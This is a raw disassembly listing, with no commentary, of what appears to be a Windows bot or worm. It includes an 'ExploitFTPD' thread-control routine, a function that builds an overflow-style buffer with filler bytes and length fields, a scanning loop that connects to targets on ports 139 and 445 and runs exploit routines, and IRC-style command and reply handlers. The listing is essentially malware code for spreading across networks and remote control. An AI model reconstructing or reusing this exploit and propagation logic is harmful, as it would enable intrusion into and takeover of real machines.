; sub_40274D+93�j
test byte ptr [esi+0Ch], 10h
jz short loc_4027AF
loc_4027FC: ; CODE XREF: sub_40274D+41�j
; sub_40274D+8F�j
push esi
call sub_422B65
pop ecx
push [ebp+arg_0]
call dword_4543AC ; closesocket
mov eax, [ebp+var_4]
pop edi
sub eax, ebx
pop esi
neg eax
sbb eax, eax
not eax
and eax, ebx
pop ebx
leave
retn
sub_40274D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40281E proc near ; CODE XREF: sub_403B2C:loc_403C3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push 9
mov [ebp+var_4], ebx
call sub_41C254
cmp eax, ebx
pop ecx
jle short loc_4028AB
push esi
mov esi, eax
imul esi, 1018h
push edi
push ebx
lea edi, dword_46D414[esi]
push dword ptr [edi]
call dword_42F048 ; TerminateThread
cmp [edi], ebx
jz short loc_402858
mov [ebp+var_4], 1
loc_402858: ; CODE XREF: sub_40281E+31�j
push dword_44D66C
mov [edi], ebx
mov dword_46D408[esi], ebx
mov dword_46D40C[esi], ebx
mov dword_46D410[esi], ebx
mov byte ptr dword_46C408[esi], bl
call dword_4543AC ; closesocket
cmp [ebp+var_4], ebx
pop edi
pop esi
jz short loc_4028AB
cmp [ebp+arg_8], ebx
jnz short loc_4028CD
push 1
push offset aExploitftpd ; "ExploitFTPD"
push offset aQo1bf0_b7k40mn ; "qo1bf0.B7k40Mnsrm1FhS.k."
push offset aSSDThreadSStop ; "%s %s (%d thread(s) stopped)."
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4104F6
add esp, 18h
jmp short loc_4028CD
; ---------------------------------------------------------------------------
loc_4028AB: ; CODE XREF: sub_40281E+14�j
; sub_40281E+65�j
cmp [ebp+arg_8], ebx
jnz short loc_4028CD
push offset aExploitftpd ; "ExploitFTPD"
push offset aQo1bf0_b7k40mn ; "qo1bf0.B7k40Mnsrm1FhS.k."
push offset aSNoSThreadFoun ; "%s No %s thread found."
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4104F6
add esp, 14h
loc_4028CD: ; CODE XREF: sub_40281E+6A�j
; sub_40281E+8B�j ...
pop ebx
leave
retn
sub_40281E endp
; =============== S U B R O U T I N E =======================================
sub_4028D0 proc near ; CODE XREF: sub_402B3C+E�p
; sub_402B3C+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_4028D0 endp
; =============== S U B R O U T I N E =======================================
sub_4028DA proc near ; CODE XREF: sub_402B3C+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_4]
push esi
push edi
push ebx
mov esi, ecx
call sub_422F79
mov edi, eax
pop ecx
test edi, edi
jz short loc_40290C
push ebx
push 0
push edi
call sub_4221F0
push ebx
push [esp+1Ch+arg_0]
push edi
call sub_4223F0
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40290C: ; CODE XREF: sub_4028DA+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_4028DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402914 proc near ; CODE XREF: sub_402A06+18�p
; sub_402A80+16�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
mov ebx, ecx
mov ecx, [ebp+arg_C]
push esi
push edi
lea edi, [eax+ecx]
push edi
call sub_422F79
mov esi, eax
pop ecx
test esi, esi
jz short loc_402960
push edi
push 0
push esi
call sub_4221F0
push [ebp+arg_4]
push [ebp+arg_0]
push esi
call sub_4223F0
push [ebp+arg_C]
mov eax, [ebp+arg_4]
add eax, esi
push [ebp+arg_8]
push eax
call sub_4223F0
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_402960: ; CODE XREF: sub_402914+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_402914 endp
; =============== S U B R O U T I N E =======================================
sub_402969 proc near ; CODE XREF: sub_402A06+5E�p
; sub_402A06+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_402979
push eax
call sub_4230B3
pop ecx
loc_402979: ; CODE XREF: sub_402969+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_402969 endp
; =============== S U B R O U T I N E =======================================
sub_402982 proc near ; CODE XREF: sub_402A06+20�p
; sub_402AE1+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_4029AC
xor ebx, ebx
cmp eax, 7Fh
setnl bl
lea ebx, [ebx+ebx+1]
add eax, ebx
push eax
call sub_422F79
mov edi, eax
pop ecx
test edi, edi
jnz short loc_4029B0
loc_4029AC: ; CODE XREF: sub_402982+D�j
xor al, al
jmp short loc_402A02
; ---------------------------------------------------------------------------
loc_4029B0: ; CODE XREF: sub_402982+28�j
mov eax, [esi+4]
add eax, ebx
push eax
push 0
push edi
call sub_4221F0
add esp, 0Ch
cmp ebx, 1
jnz short loc_4029D0
mov al, [esi+4]
mov [edi], al
lea eax, [edi+1]
jmp short loc_4029E5
; ---------------------------------------------------------------------------
loc_4029D0: ; CODE XREF: sub_402982+42�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
lea eax, [edi+3]
loc_4029E5: ; CODE XREF: sub_402982+4C�j
push dword ptr [esi+4]
push dword ptr [esi]
push eax
call sub_4223F0
add esp, 0Ch
push dword ptr [esi]
call sub_4230B3
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_402A02: ; CODE XREF: sub_402982+2C�j
pop edi
pop esi
pop ebx
retn
sub_402982 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A06 proc near ; CODE XREF: sub_402B3C+89�p
; sub_402B3C+E3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+var_8]
push dword ptr [esi+4]
push dword ptr [esi]
push 1
push offset word_44D6A0
call sub_402914
lea ecx, [ebp+var_8]
call sub_402982
mov eax, [ebp+var_4]
inc eax
push eax
call sub_422F79
mov edi, eax
pop ecx
test edi, edi
jnz short loc_402A40
xor al, al
jmp short loc_402A7C
; ---------------------------------------------------------------------------
loc_402A40: ; CODE XREF: sub_402A06+34�j
mov eax, [ebp+var_4]
inc eax
push eax
push 0
push edi
call sub_4221F0
mov byte ptr [edi], 3
push [ebp+var_4]
lea eax, [edi+1]
push [ebp+var_8]
push eax
call sub_4223F0
add esp, 18h
mov ecx, esi
call sub_402969
mov eax, [ebp+var_4]
lea ecx, [ebp+var_8]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_402969
mov al, 1
loc_402A7C: ; CODE XREF: sub_402A06+38�j
pop edi
pop esi
leave
retn
sub_402A06 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A80 proc near ; CODE XREF: sub_402AB4+14�p
; sub_402AD1+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4]
lea ecx, [ebp+var_8]
push [ebp+arg_0]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_402914
mov ecx, esi
call sub_402969
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_402A80 endp
; =============== S U B R O U T I N E =======================================
sub_402AB4 proc near ; CODE XREF: sub_402B3C+F0�p
; sub_402B3C+15B�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
call sub_422120
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_402A80
pop esi
retn 4
sub_402AB4 endp
; =============== S U B R O U T I N E =======================================
sub_402AD1 proc near ; CODE XREF: sub_402B1D+B�p
; sub_402B3C+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_402A80
retn 8
sub_402AD1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402AE1 proc near ; CODE XREF: sub_402B1D+16�p
; sub_402B3C+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_402982
test al, al
jz short loc_402B1A
push dword ptr [esi+4]
lea ecx, [ebp+var_8]
push dword ptr [esi]
push 1
push offset dword_4331F0
call sub_402914
mov ecx, esi
call sub_402969
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_402B1A: ; CODE XREF: sub_402AE1+F�j
pop esi
leave
retn
sub_402AE1 endp
; =============== S U B R O U T I N E =======================================
sub_402B1D proc near ; CODE XREF: sub_402B3C+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_402AD1
test al, al
jz short loc_402B38
mov ecx, esi
call sub_402AE1
loc_402B38: ; CODE XREF: sub_402B1D+12�j
pop esi
retn 8
sub_402B1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B3C proc near ; CODE XREF: .text:004030F0�p
var_858 = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_4028D0
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_402E80
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_402E80
push esi
lea ecx, [ebp+var_30]
call sub_4028D0
lea ecx, [ebp+var_20]
call sub_4028D0
lea ecx, [ebp+var_50]
call sub_4028D0
lea ecx, [ebp+var_18]
call sub_4028D0
lea ecx, [ebp+var_40]
call sub_4028D0
lea ecx, [ebp+var_38]
call sub_4028D0
lea ecx, [ebp+var_28]
call sub_4028D0
push 4
push offset dword_432F54
lea ecx, [ebp+var_30]
call sub_402A80
push 3
push offset dword_432F5C
lea ecx, [ebp+var_30]
call sub_402A80
lea ecx, [ebp+var_30]
call sub_402A06
lea ecx, [ebp+var_30]
call sub_402AE1
mov esi, 800h
lea eax, [ebp+var_858]
push esi
push 42h
push eax
call sub_4221F0
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset aRbrbrbrb ; "BBBB"
call sub_402A80
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_402A80
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_858]
push eax
call sub_402A80
lea ecx, [ebp+var_20]
call sub_402A06
push offset loc_433214
lea ecx, [ebp+var_50]
call sub_402AB4
lea ecx, [ebp+var_50]
call sub_402A06
push esi
lea eax, [ebp+var_858]
push 44h
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_58]
push 410h
push eax
call sub_4028DA
lea ecx, [ebp+var_58]
call sub_402A06
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_402B1D
lea ecx, [ebp+var_58]
call sub_402969
push esi
lea eax, [ebp+var_858]
push 43h
push eax
call sub_4221F0
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_402AB4
push 4
push offset dword_432F60
lea ecx, [ebp+var_18]
call sub_402A80
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_402A80
sub edi, [ebp+arg_8]
lea eax, [ebp+var_858]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_402A80
lea ecx, [ebp+var_18]
call sub_402A06
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_402AD1
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_402AD1
lea ecx, [ebp+var_40]
call sub_402AE1
lea ecx, [ebp+var_18]
call sub_402969
lea ecx, [ebp+var_50]
call sub_402969
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_402AD1
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_402AD1
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_402AD1
lea ecx, [ebp+var_38]
call sub_402AE1
lea ecx, [ebp+var_20]
call sub_402969
lea ecx, [ebp+var_30]
call sub_402969
lea ecx, [ebp+var_40]
call sub_402969
push esi
lea eax, [ebp+var_858]
push 41h
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_858]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_402A80
lea ecx, [ebp+var_28]
call sub_402A06
push 2
push offset dword_433208
lea ecx, [ebp+var_28]
call sub_402A80
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_402AD1
lea ecx, [ebp+var_28]
call sub_402AE1
lea ecx, [ebp+var_38]
call sub_402969
lea ecx, [ebp+var_10]
call sub_4028D0
lea ecx, [ebp+var_8]
call sub_4028D0
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_402AD1
lea ecx, [ebp+var_10]
call sub_402982
lea ecx, [ebp+var_28]
call sub_402969
push offset dword_433204
lea ecx, [ebp+var_8]
call sub_402AB4
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_402AD1
lea ecx, [ebp+var_8]
call sub_402982
lea ecx, [ebp+var_10]
call sub_402969
push offset a0 ; "0"
lea ecx, [ebp+var_10]
call sub_402AB4
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_402AD1
lea ecx, [ebp+var_10]
call sub_402982
lea ecx, [ebp+var_8]
call sub_402969
push offset dword_4331F8
lea ecx, [ebp+var_8]
call sub_402AB4
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_402AD1
lea ecx, [ebp+var_8]
call sub_402982
lea ecx, [ebp+var_10]
call sub_402969
push offset dword_4331F4
lea ecx, [ebp+var_48]
call sub_402AB4
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_402AD1
lea ecx, [ebp+var_8]
call sub_402969
pop esi
loc_402E80: ; CODE XREF: sub_402B3C+1B�j
; sub_402B3C+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop edi
pop ebx
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
leave
retn
sub_402B3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E92 proc near ; CODE XREF: sub_402F57+A2�p
; sub_402F57+C7�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_8]
push edi
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
xor edi, edi
push eax
lea eax, [esi+1]
inc edi
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call dword_4542FC ; select
cmp eax, edi
jnz short loc_402EFA
lea eax, [ebp+var_10C]
push eax
push esi
call dword_4541E4 ; __WSAFDIsSet
test eax, eax
jnz short loc_402EFE
loc_402EFA: ; CODE XREF: sub_402E92+54�j
xor eax, eax
jmp short loc_402F0E
; ---------------------------------------------------------------------------
loc_402EFE: ; CODE XREF: sub_402E92+66�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_454330 ; recv
loc_402F0E: ; CODE XREF: sub_402E92+6A�j
pop edi
pop esi
leave
retn
sub_402E92 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F12 proc near ; CODE XREF: sub_402F57+80�p
; sub_402F57+AE�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_454310 ; ntohl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call dword_454350 ; send
cmp eax, 4
jz short loc_402F3C
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_402F3C: ; CODE XREF: sub_402F12+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_454350 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_402F12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F57 proc near ; CODE XREF: sub_403036+48�p
; .text:0040318D�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea ebx, [edi+41h]
push ebx
mov [ebp+var_4], ebx
call sub_422F79
mov esi, eax
pop ecx
test esi, esi
jnz short loc_402F80
xor al, al
jmp loc_403031
; ---------------------------------------------------------------------------
loc_402F80: ; CODE XREF: sub_402F57+20�j
push ebx
push 0
push esi
call sub_4221F0
push 2Fh
push offset dword_432FF0
push esi
call sub_4223F0
push 8
lea eax, [esi+31h]
push offset dword_433020
push eax
mov [esi+2Fh], di
call sub_4223F0
push edi
lea ebx, [esi+3Bh]
push [ebp+arg_4]
mov [esi+39h], di
push ebx
call sub_4223F0
push 6
add ebx, edi
push offset dword_44D698
push ebx
call sub_4223F0
push 85h
push offset dword_432F68
push [ebp+arg_0]
call sub_402F12
add esp, 48h
test al, al
jnz short loc_402FE7
loc_402FE3: ; CODE XREF: sub_402F57+B8�j
xor bl, bl
jmp short loc_403028
; ---------------------------------------------------------------------------
loc_402FE7: ; CODE XREF: sub_402F57+8A�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push [ebp+arg_0]
call sub_402E92
push [ebp+var_4]
push esi
push [ebp+arg_0]
call sub_402F12
add esp, 1Ch
test al, al
jz short loc_402FE3
push 0
lea eax, [ebp+var_104]
push edi
push eax
push [ebp+arg_0]
call sub_402E92
add esp, 10h
mov bl, 1
loc_403028: ; CODE XREF: sub_402F57+8E�j
push esi
call sub_4230B3
pop ecx
mov al, bl
loc_403031: ; CODE XREF: sub_402F57+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_402F57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403036 proc near ; CODE XREF: .text:00403173�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_433030
push [ebp+arg_0]
call dword_454350 ; send
cmp eax, 48h
jnz short loc_403071
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_402E92
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_403071
cmp [ebp+var_20], 82h
jz short loc_403075
loc_403071: ; CODE XREF: sub_403036+1B�j
; sub_403036+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_403075: ; CODE XREF: sub_403036+39�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402F57
add esp, 0Ch
leave
retn
sub_403036 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 418h
and byte ptr [ebp-418h], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-417h]
push 7
rep stosd
stosw
stosb
lea eax, [ebp-418h]
push offset dword_4331E8
push eax
call sub_4223F0
push 158h
lea eax, [ebp-418h]
push offset dword_432980
push eax
call sub_4223F0
lea eax, [ebp-418h]
push 400h
push eax
push 164h
lea eax, [ebp-8]
push offset sub_433080
push eax
call sub_402B3C
xor ebx, ebx
add esp, 2Ch
cmp [ebp-4], ebx
jnz short loc_403106
xor eax, eax
jmp loc_403219
; ---------------------------------------------------------------------------
loc_403106: ; CODE XREF: .text:004030FD�j
; .text:0040311F�j ...
test ebx, ebx
jnz loc_4031A4
push 6
push 1
push 2
call dword_454394 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_403106
xor eax, eax
lea edi, [ebp-16h]
stosd
push dword ptr [ebp+0C0h]
stosd
stosd
stosw
mov word ptr [ebp-18h], 2
call dword_454314 ; ntohs
mov [ebp-16h], ax
lea eax, [ebp+10h]
push eax
call dword_45434C ; inet_addr
mov [ebp-14h], eax
lea eax, [ebp-18h]
push 10h
push eax
push esi
call dword_4542AC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_403198
cmp dword ptr [ebp+0C0h], 8Bh
jnz short loc_40317A
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push esi
call sub_403036
jmp short loc_403192
; ---------------------------------------------------------------------------
loc_40317A: ; CODE XREF: .text:0040316A�j
cmp dword ptr [ebp+0C0h], 1BDh
jnz short loc_403198
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push esi
call sub_402F57
loc_403192: ; CODE XREF: .text:00403178�j
add esp, 0Ch
movzx ebx, al
loc_403198: ; CODE XREF: .text:0040315E�j
; .text:00403184�j
push esi
call dword_4543AC ; closesocket
jmp loc_403106
; ---------------------------------------------------------------------------
loc_4031A4: ; CODE XREF: .text:00403108�j
lea ecx, [ebp-8]
call sub_402969
movzx eax, word_439014
push eax
lea esi, [ebp+10h]
sub esp, 0D0h
push 34h
pop ecx
mov edi, esp
rep movsd
call sub_401160
add esp, 0D4h
test eax, eax
jz short loc_403216
mov eax, [ebp+0C8h]
lea eax, [eax+eax*8]
shl eax, 3
lea ecx, dword_432090[eax]
inc dword ptr [ecx]
cmp dword ptr [ebp+0D8h], 0
mov ecx, [ecx]
jz short loc_403216
push ecx
lea ecx, [ebp+10h]
lea eax, dword_432069[eax]
push ecx
push eax
push offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
push offset aSSSExD ; "%s %s -> %s (Ex: %d)"
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_4104F6
add esp, 1Ch
loc_403216: ; CODE XREF: .text:004031D1�j
; .text:004031F0�j
xor eax, eax
inc eax
loc_403219: ; CODE XREF: .text:00403101�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40321E: ; DATA XREF: .text:00432004�o
test byte_631764, 1
jnz short loc_40322E
or byte_631764, 1
loc_40322E: ; CODE XREF: .text:00403225�j
jmp $+5
push offset nullsub_1
call sub_42321A
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40323F proc near ; CODE XREF: sub_403B2C+32A3�p
; sub_403B2C+32B0�p
var_40 = byte ptr -40h
var_36 = byte ptr -36h
push ebp
mov ebp, esp
sub esp, 40h
push ebx
push esi
push edi
push 0C8h
mov ebx, offset byte_44D6A8
push 0
push ebx
call sub_4221F0
push 10h
mov esi, offset a0123456789abcd ; "0123456789ABCDEFGHIJKLMNOPQRSTUVWXWYZab"...
pop ecx
lea edi, [ebp+var_40]
lea eax, [ebp+var_40]
rep movsd
push eax
call sub_422120
add esp, 10h
mov edi, eax
xor esi, esi
loc_403277: ; CODE XREF: sub_40323F+62�j
call sub_4220FC
test esi, esi
cdq
jz short loc_40328F
idiv edi
mov al, [ebp+edx+var_40]
mov byte_44D6A8[esi], al
jmp short loc_40329D
; ---------------------------------------------------------------------------
loc_40328F: ; CODE XREF: sub_40323F+40�j
lea ecx, [edi-0Ah]
idiv ecx
mov al, [ebp+edx+var_36]
mov byte_44D6A8, al
loc_40329D: ; CODE XREF: sub_40323F+4E�j
inc esi
cmp esi, 67h
jl short loc_403277
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn
sub_40323F endp
; =============== S U B R O U T I N E =======================================
sub_4032AA proc near ; CODE XREF: sub_403B2C+254C�p
; sub_403B2C+27D8�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push offset asc_433F80 ; "\n"
push edi
call sub_423270
pop ecx
mov esi, offset dword_44D774
pop ecx
loc_4032C2: ; CODE XREF: sub_4032AA+42�j
cmp dword ptr [esi-4], 1
jnz short loc_4032E0
cmp dword ptr [esi], 0
jbe short loc_4032E0
push 0
push edi
call sub_422120
pop ecx
push eax
push edi
push dword ptr [esi]
call dword_454350 ; send
loc_4032E0: ; CODE XREF: sub_4032AA+1C�j
; sub_4032AA+21�j
add esi, 210h
cmp esi, offset dword_453E94
jl short loc_4032C2
pop edi
pop esi
retn
sub_4032AA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4032F1 proc near ; CODE XREF: sub_4033F0+168�p
var_420 = byte ptr -420h
var_220 = byte ptr -220h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
mov esi, offset asc_433F94 ; " "
push edi
push esi
push [ebp+arg_0]
call sub_422248
xor edi, edi
pop ecx
inc edi
pop ecx
mov [ebp+var_20], eax
xor ebx, ebx
loc_403315: ; CODE XREF: sub_4032F1+35�j
push esi
push ebx
call sub_422248
mov [ebp+edi*4+var_20], eax
inc edi
pop ecx
cmp edi, 8
pop ecx
jl short loc_403315
cmp [ebp+var_20], ebx
mov esi, [ebp+var_1C]
jnz short loc_40333C
cmp esi, ebx
jnz short loc_40333C
xor eax, eax
inc eax
jmp loc_4033EB
; ---------------------------------------------------------------------------
loc_40333C: ; CODE XREF: sub_4032F1+3D�j
; sub_4032F1+41�j
push [ebp+var_20]
push offset aRa ; "=RA"
call sub_422760
pop ecx
pop ecx
test eax, eax
push esi
jnz short loc_40336B
push offset aTa ; "=TA"
lea eax, [ebp+var_220]
push offset aSS_4 ; "%s %s\n"
push eax
call sub_422063
add esp, 10h
jmp short loc_4033CA
; ---------------------------------------------------------------------------
loc_40336B: ; CODE XREF: sub_4032F1+5D�j
push offset a433 ; "433"
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_40338C
push esi
push offset a432 ; "432"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_4033E9
loc_40338C: ; CODE XREF: sub_4032F1+88�j
push 200h
lea eax, [ebp+var_420]
push ebx
push eax
call sub_4221F0
lea eax, [ebp+var_420]
push eax
call sub_403625
lea eax, [ebp+var_420]
push eax
push offset dword_43C088
lea eax, [ebp+var_220]
push offset aSS_4 ; "%s %s\n"
push eax
call sub_422063
add esp, 20h
loc_4033CA: ; CODE XREF: sub_4032F1+78�j
lea eax, [ebp+var_220]
push ebx
push eax
call sub_422120
pop ecx
push eax
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
call dword_454350 ; send
loc_4033E9: ; CODE XREF: sub_4032F1+99�j
xor eax, eax
loc_4033EB: ; CODE XREF: sub_4032F1+46�j
pop edi
pop esi
pop ebx
leave
retn
sub_4032F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033F0 proc near ; DATA XREF: sub_4035A8+60�o
var_4008 = byte ptr -4008h
var_3008 = byte ptr -3008h
var_2008 = byte ptr -2008h
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 4008h
call sub_4220C0
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
imul esi, 210h
xor edi, edi
push dword_44D97C[esi]
lea eax, dword_44D77C[esi]
inc edi
push eax
mov dword_44D770[esi], edi
call sub_414275
pop ecx
xor ebx, ebx
cmp eax, edi
pop ecx
mov dword_44D774[esi], eax
jb loc_403588
mov edi, 1000h
lea eax, [ebp+var_2008]
push edi
push ebx
push eax
call sub_4221F0
add esp, 0Ch
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
lea eax, [ebp+var_2008]
push eax
call sub_403625
lea eax, [ebp+var_4008]
push eax
call sub_403625
lea eax, [ebp+var_3008]
push eax
call sub_403625
lea eax, [ebp+var_3008]
push eax
lea eax, [ebp+var_4008]
push eax
lea eax, [ebp+var_2008]
push offset a8hj ; "8HJ"
push eax
push offset dword_43C088
